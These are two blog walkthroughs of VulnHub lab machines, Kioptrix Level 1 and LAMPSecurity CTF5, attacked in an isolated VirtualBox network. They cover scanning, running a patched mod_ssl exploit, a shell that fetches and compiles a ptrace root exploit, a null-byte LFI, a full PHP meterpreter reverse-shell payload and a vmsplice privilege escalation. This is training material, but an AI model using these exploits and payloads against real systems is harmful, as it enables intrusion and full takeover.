Sunday, November 15, 2015

Tango Down (Kioptrix1) : Kioptrix Level 1 (#1) Challenge Walkthrough


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ on VirtualBox
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below

Discovery :Changed the setting for the VMas host-only, ran an nmapscan

root@kali:~/tools/practice/bash/lab# nmap -sT 192.168.56.1-254

Starting Nmap6.47 ( http://nmap.org) at 2015-10-27 23:09 GMT
Nmapscan report for 192.168.56.1
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmapscan report for 192.168.56.100
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BD:93:7E (CadmusComputer Systems)

Nmapscan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
139/tcp open netbios-ssn
32768/tcpopen filenet-tms
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)

Nmapscan report for 192.168.56.110
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcpopen ssh

Nmapdone: 254 IP addresses (4 hosts up) scanned in 15.41 seconds

Additional Scan

root@kali:~/tools/practice/bash/lab# nmap-v -sS -sV -O 192.168.56.101

Starting Nmap6.47 ( http://nmap.org) at 2015-10-27 23:14 GMT
NSE: Loaded 29 scripts for scanning.
Initiating ARPPing Scan at 23:14
Scanning 192.168.56.101 [1 port]
Completed ARPPing Scan at 23:14, 0.01s elapsed (1 total hosts)
Initiating Parallel DNSresolution of 1 host. at 23:14
Completed Parallel DNSresolution of 1 host. at 23:14, 0.02s elapsed
Initiating SYN Stealth Scan at 23:14
Scanning 192.168.56.101 [1000 ports]
Discovered open port 443/tcpon 192.168.56.101
Discovered open port 139/tcpon 192.168.56.101
Discovered open port 22/tcpon 192.168.56.101
Discovered open port 111/tcpon 192.168.56.101
Discovered open port 80/tcpon 192.168.56.101
Discovered open port 32768/tcpon 192.168.56.101
Completed SYN Stealth Scan at 23:14, 0.34s elapsed (1000 total ports)
Initiating Service scan at 23:14
Scanning 6 services on 192.168.56.101
Completed Service scan at 23:14, 12.08s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSEat 23:14
Completed NSEat 23:14, 0.04s elapsed
Nmapscan report for 192.168.56.101
Host is up (0.00031s latency).
Not shown: 994 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC#100000)
139/tcp open netbios-ssn Samba smbd(workgroup: 9DMYGROUP)
443/tcp open ssl/http Apache httpd1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcpopen status 1 (RPC#100024)
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Tue Oct 27 23:08:14 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IPID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmapdone: 1 IPaddress (1 host up) scanned in 14.50 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1018 (41.493KB)

So some vectors we see from above are :
  • SSH Server
  • Web Server (http,https)
  • Samba Server
  • NFS Server, Portmapper(111)
Tried accessing the web server:


Seems like a redhat server


Lets run some NMAPNSE's:

-- Tried http nmap nse's - no results
-- Tried SMB nse's, including smb-vulns-scan -- Nothing interesting


Vulnerability Assessment and Exploit :
Run Nikto:

root@kali:~/vulhub/kioptrix1.0# nikto -h 192.168.56.101
- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-27 23:33:56 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodesvia ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 04:12:46 2001
+ The anti-clickjackingX-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSSvia the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username(responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoSand possible code execution. CAN-2002-0392.+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizermay be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 10 error(s) and 18 item(s) reported on remote host
+ End Time: 2015-10-27 23:40:54 (GMT0) (418 seconds)
---------------------------------------------------------------------------

Found some vulnerabilities as above. Search for CVE-2002-0082 and you will get the below link :

https://www.exploit-db.com/exploits/764/

Once your download this , you need to compile and execute this :

root@kali:~/vulhub/kioptrix1.0# ls
764.c http-nse.txt smb-nse.txt

root@kali:~/vulhub/kioptrix1.0# gcc764.c -o openfk
764.c:651:2: error: unknown type name ‘RC4_KEY’
764.c:652:2: error: unknown type name ‘RC4_KEY’
764.c: In function ‘read_ssl_packet’:
764.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c:844:7: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘send_ssl_packet’:
764.c:882:2: error: unknown type name ‘MD5_CTX’
764.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘get_server_hello’:
764.c:1009:2: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [enabled by default]
In file included from /usr/include/openssl/ssl.h:156:0,
from 764.c:20:
/usr/include/openssl/x509.h:840:1: note: expected ‘constunsigned char **’ but argument is of type ‘unsigned char **’
764.c: In function ‘generate_key_material’:
764.c:1106:2: error: unknown type name ‘MD5_CTX’
764.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘generate_session_keys’:
764.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764.c:1127:31: error: expected expression before ‘)’ token
764.c:1131:32: error: expected expression before ‘)’ token

Now it is very likely that you get the above error while compiling. After hours of search I found the below link which can help in fixing the problem... (I so wish I knew c programming)

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
Here are the steps to make this work :

1) Add those headers :

#include
#include

2) Update the URL of the C file.

Search for wgetand replace the URL with this new one :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get libssl-devlib

Install them : apt-get install libssl-dev

4) Update declaration of variables

Line 961, change : unsigned char *p, *end;
By adding const: constunsigned char *p, *end;

5) Compile then code and you’re done

To compile :
gcc-o OpenFuck764.c -lcrypto 

root@kali:~/vulhub/kioptrix1.0# gccopenfk.c -o openfk-lcrypto

root@kali:~/vulhub/kioptrix1.0# ls -l
total 140
-rw-r--r-- 1 root root 33617 Oct 27 23:39 764.c
-rw-r--r-- 1 root root 2289 Oct 27 23:23 http-nse.txt
-rwxr-xr-x 1 root root 60991 Oct 27 23:47 openfk
-rw-r--r-- 1 root root 33684 Oct 27 23:46 openfk.c
-rw-r--r-- 1 root root 351 Oct 27 23:24 smb-nse.txt
root@kali:~/vulhub/kioptrix1.0# ./openfk

*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

: Usage: ./openfktarget box [port] [-c N]

target - supported box eg: 0x00
box - hostnameor IPaddress
port - port for sslconnection
-c open N connections. (use range 40-50 if u dontknow)
++++ Truncated++++++++++++++++++

Now for the targets, the closest as per our version match from nmapis as below
0x6a - RedHatLinux 7.2 (apache-1.3.20-16)1
0x6b - RedHatLinux 7.2 (apache-1.3.20-16)2

nmapoutput : 80/tcp open http Apache httpd1.3.20((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)


Running the exploit
root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6a 192.168.56.101 443 -c 50
*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

Connection... 50 of 50
Establishing SSLconnection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a did not give us a shell, lets try the other one... 0x6b



root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6b 192.168.56.101 443 -c 50

*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

Connection... 50 of 50
Establishing SSLconnection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ hostname
hostname
kioptrix.level1
bash-2.05$ uname-a
uname-a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep6 16:46:36 EDT 2001 i686 unknown
bash-2.05$ cat /etc/release
cat /etc/release
cat: /etc/release: No such file or directory
bash-2.05$ cat /etc/issue
cat /etc/issue
Welcome to Kioptrix Level 1 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrixis not resposiblefor any damage or instability
caused by running, installing or using this VMimage.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

bash-2.05$ Good Bye!

Now we are in and have a shell. Time for escalating our privileges.

Privilege Escalation
We see when we run the above exploit, it tries to download the ptrace-kmod.c to give us a root shell, however that doesnthappen.

exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'

What we can do is to manually download this file on your host :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Once you download it, compile it .. when I compile it on my Kali node, below is what I get..

root@kali:~/vulhub/kioptrix1.0# gcc895.c -o privesc1
895.c:80:1: warning: missing terminating " character [enabled by default]
895.c:80:1: error: missing terminating " character
895.c:81:1: error: stray ‘\’ in program
895.c:81:1: error: stray ‘\’ in program
895.c:81:2: error: ‘x00’ undeclared here (not in a function)
895.c:81:6: error: expected ‘,’ or ‘;’ before ‘x00’
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program

This is full of errors, probably its a new compiler version so this problem. What I did was that I downloaded this c file from my attacking node to the victim node, compiled it on that node only as this was older version. Post compilation I ran the binarybash-2.05$ wget http://192.168.56.110/ptrace-kmod.c

wget http://192.168.56.110/ptrace-kmod.c
--00:05:36-- http://192.168.56.110/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.110:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

00:05:36 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

bash-2.05$ ls
ls
895.c
ptrace-kmod.c
bash-2.05$ gccptrace-kmodc-o ptrace
gccptrace-kmodc-o ptrace
gcc: ptrace-kmodc: No such file or directory
gcc: No input files
bash-2.05$ gccptrace-kmodc.c -o ptrace
gccptrace-kmodc.c -o ptrace
gcc: ptrace-kmodc.c: No such file or directory
gcc: No input files
bash-2.05$ gccptrace-kmod.c -o ptrace
gccptrace-kmod.c -o ptrace
bash-2.05$ ls
ls
895.c
ptrace
ptrace-kmod.c
bash-2.05$ chmod+x ptrace
chmod+x ptrace
bash-2.05$ ./ptrace
./ptrace
[+] Attached to 6416
[+] Waiting for signal
[+] Signal caught
[+] Shellcodeplaced at 0x4001189d
[+] Now wait for suidshell...


id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


We are now as root in the node


Sunday, November 1, 2015

Tango Down (CTF5) : Capture The Flag (CTF) 5 Lamp Security Challenge


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/lampsecurity-ctf5,84/  on VirtualBox (MacOS)
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below


Discovery :

Install the image

Run a network scan on the range :
root@kali:~/vulhub/ctf5# nmap-sT192.168.56.1-254
Starting Nmap6.47 ( http://nmap.org) at 2015-10-31 00:22 GMT
Nmapscan report for 192.168.56.1
Host is up (0.00036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmapscan report for 192.168.56.100
Host is up (0.000079s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:79:AC:8C (CadmusComputer Systems)

Nmapscan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
901/tcp open samba-swat
3306/tcpopen mysql
MAC Address: 08:00:27:C3:02:2B (CadmusComputer Systems)


Nmapscan report for 192.168.56.110
Host is up (0.00010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcpopen ssh
80/tcpopen http

Nmapdone: 254 IPaddresses (4 hosts up) scanned in 15.32 seconds


Possible vectors are :

  • Webserver
  • Mail (IMAP,POP)
  • NFS, Portmapper
  • netbios
  • samba
  • mysql


Assessing the webserver:
Open the link in browser (http://192.168.56.101)

It gives us a default linux apache page :






just tried giving different paths

e.g. index.php... gives below :




When I click blog I get :



When I go back and click contact :



Go back and click Events



Now we see this has different webappsinstalled.

Now on the blogpage, clicking on the links on the navigation pane, I have got below :Webmail




Admin Login





Vulnerability Assessment and Exploit :

Squirrelmailversion had 2 found vulnerabilities :
root@kali:/var/www# searchsploitsquirrel |grep1.4.x
SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability | /php/webapps/24068.txt
Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability | /php/webapps/27948.txt

Tried them :
Squirrelmail1.4.x Redirect.PHPLocal File Include Vulnerability :



SquirrelMail1.4.x Folder Name Cross-Site Scripting Vulnerability

Same as above, no luck..

No lets run Niktoto see if we can get some more :

root@kali:~/tools/practice/bash/lab# nikto-h http://192.168.56.101

- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-31 21:18:00 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/2.2.6 (Fedora)
+ Retrieved x-powered-by header: PHP/5.2.4
+ The anti-clickjackingX-Frame-Options header is not present.
+ Apache/2.2.6 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username(responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ /index.php?page=../../../../../../../../../../etc/passwd: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=../../../../../../../../../../boot.ini: PHPinclude error may indicate local or remote file inclusion is possible.

+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHPreveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdminis for managing MySQLdatabases, and should be protected or limited to authorized hosts.
+ Cookie SQMSESSIDcreated without the httponlyflag
+ OSVDB-3093: /mail/src/read_body.php: SquirrelMailfound
+ OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMailfound
+ OSVDB-3233: /info.php: PHPis installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Server leaks inodesvia ETags, header found with file /icons/README, inode: 557285, size: 5108, mtime: Fri Jun 19 19:31:28 1998
+ OSVDB-3233: /icons/README: Apache default file found.
+ /index.php?module=PostWrap&page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt?: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page=http://cirt.net/rfiinc.txt??: PHPinclude error may indicate local or remote file inclusion is possible.
+ /index.php?page[path]=http://cirt.net/rfiinc.txt??&cmd=ls: PHPinclude error may indicate local or remote file inclusion is possible.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFIfrom RSnake'slist (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /phpmyadmin/: phpMyAdmindirectory found

+ 7355 requests: 0 error(s) and 27 item(s) reported on remote host
+ End Time: 2015-10-31 21:18:37 (GMT0) (37 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

So now we got some more vectors.

Trying the below paths one by one :
/index.php?page=../../../../../../../../../../etc/passwd << As per nikto, no luck





We removed the path and saw what comes up, if we see above it shows that it is also adding a .phpas suffix, so we need to add "" which is a nullbyteand terminate the addition of php

Now keep adding ../etc/passwd till we get some results


Bang, we see LFIsuccessful.

Now we try to fetch some more information e.g. mysql:



[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
user=mysql
# Default to using old password format for compatibility with mysql3.x
# clients (those using the mysqlclient10 compatibility package).
old_passwords=1 [mysqld_safe]
log-error=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid

Try viewing access_log :




Another vector was the Nanocms




Using Google :



http://www.securityfocus.com/bid/34508/exploit

When we try this :





For us the key from above is :
"username";s:5:"admin";s:8:"password";s:32:"9d2f75377ac0ab991d40c91fd27e52fd";s:7:"version";s:4:"v_4f";}

Now cracking the password :





Now lets try to access the portal :We managed to login to the admin panel




Now we see that we have an option to create a new page using the adminpanel

My steps would be :

1- Create a phppayload on my KALI host
2- Create a page on NanoCMSand copy the code on the nanocms
3- Open a handler on my KALI host
4- Open the shellcodepage
5- We should get our meterpreteron our KALI host

Lets try it now.


Step 1 :

root@kali:/var/www# msfpayloadphp/meterpreter/reverse_tcpLHOST=192.168.56.110 LPORT=4444 R > malicious.php
[!] ************************************************************************
[!] * The utility msfpayloadis deprecated! *
[!] * It will be removed on or about 2015-06-08 *
[!] * Please use msfvenominstead *
[!] * Details: https://github.com/rapid7/metasploit-framework/pull/4333 *
[!] ************************************************************************
root@kali:/var/www# vi malicious.php
root@kali:/var/www# cat malicious.php
#
error_reporting(0);
# The payload handler overwrites this with the correct LHOSTbefore sending
# it to the victim.
$ip= '192.168.56.110';
$port = 4444;
$ipf= AF_INET;

if (FALSE !== strpos($ip, ":")) {
# ipv6 requires brackets around the address
$ip= "[". $ip."]";
$ipf= AF_INET6;
}

if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
} elseif(($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
} elseif(($f = 'socket_create') && is_callable($f)) {
$s = $f($ipf, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) { die(); }
$s_type = 'socket';
} else {
die('no socket funcs');
}
if (!$s) { die('no socket'); }

switch ($s_type) {
case 'stream': $len= fread($s, 4); break;
case 'socket': $len= socket_read($s, 4); break;
}
if (!$len) {
# We failed on the main socket. There's no way to continue, so
# bail
die();
}
$a = unpack("Nlen", $len);
$len= $a['len'];

$b = '';
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b)); break;
case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
}
}

# Set up the socket for the main stage to use.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
eval($b);
die();


Step 2 :




Step 3:msfexploit(udev_netlink) > use exploit/multi/handler
msfexploit(handler) > set LPORT4444
LPORT=> 4444
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (linux/x86/shell/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msfexploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.110 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WildcardTarget


msfexploit(handler) > exploit

[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...

Step 4:





Step 5:msfexploit(handler) > exploit 
[*] Started reverse handler on 192.168.56.110:4444
[*] Starting the payload handler...
[*] Sending stage (40499 bytes) to 192.168.56.101
[*] Meterpretersession 3 opened (192.168.56.110:4444 -> 192.168.56.101:35181) at 2015-10-31 23:49:23 +0000

meterpreter> sysinfo
Computer : localhost.localdomain
OS :Linux localhost.localdomain2.6.23.1-42.fc8#1 SMPTue Oct 30 13:55:12 EDT 2007 i686
Meterpreter: php/php

meterpreter> getuid
Server username: apache (48)
meterpreter> getpid
Current pid: 6464


We have a shell now

However we are in with apache user. We need to attempt an privilege escalation


Now steps I will try :

Step 1 : As I am on KALI linux, will search for PE exploits locally first
root@kali:~/vulhub/ctf5# searchsploit2.6.23 local linux
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------- Description | Path
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Linux Kernel 2.6.23 <= 2.6.24 - vmspliceLocal Root Exploit | /linux/local/5093.c
--------------------------------------------------------------------------------------------------------------------------- ----------------------------------

Step 2 : Will compile the binary
root@kali:~/vulhub/ctf5# locate /linux/local/5093.c
/usr/share/exploitdb/platforms/linux/local/5093.c
root@kali:~/vulhub/ctf5# cp/usr/share/exploitdb/platforms/linux/local/5093.c .
root@kali:~/vulhub/ctf5# ls -ltr
total 4
-rwxr-xr-x 1 root root 2883 Nov 1 00:02 5093.c
root@kali:~/vulhub/ctf5# gcc5093.c -o 5093

Step 3 : Transfer the file to the victim from the meterpreter
meterpreter> lcdvulhub
meterpreter> lcdctf5
meterpreter> lpwd
/root/vulhub/ctf5
meterpreter> upload 5093 /tmp/5093
[*] uploading : 5093 -> /tmp/5093
[*] uploaded : 5093 -> /tmp/5093

Step 4 : Now execute the file and see if we get root

meterpreter> shell
Process 13468 created.
Channel 2 created.

cd/tmp

ls
5093
gconfd-patrick
gconfd-root
gnome-system-monitor.patrick.3563912106
mapping-andy
mapping-jennifer
mapping-loren
mapping-patrick
mapping-root


./5093
/bin/sh: line 9: ./5093: Permission denied

chmod+x 5093


./5093
bash: no job control in this shell

bash-3.2# id
uid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_t:s0

bash-3.2# whoami
root
WE ARE ROOT NOW !!

Post Exploit:

bash-3.2# cat passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:RpcbindDaemon:/var/lib/rpcbind:/sbin/nologin
nscd:x:28:28:NSCDDaemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37:RPM user:/var/lib/rpm:/sbin/nologin
polkituser:x:87:87:PolicyKit:/:/sbin/nologin
avahi:x:499:499:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
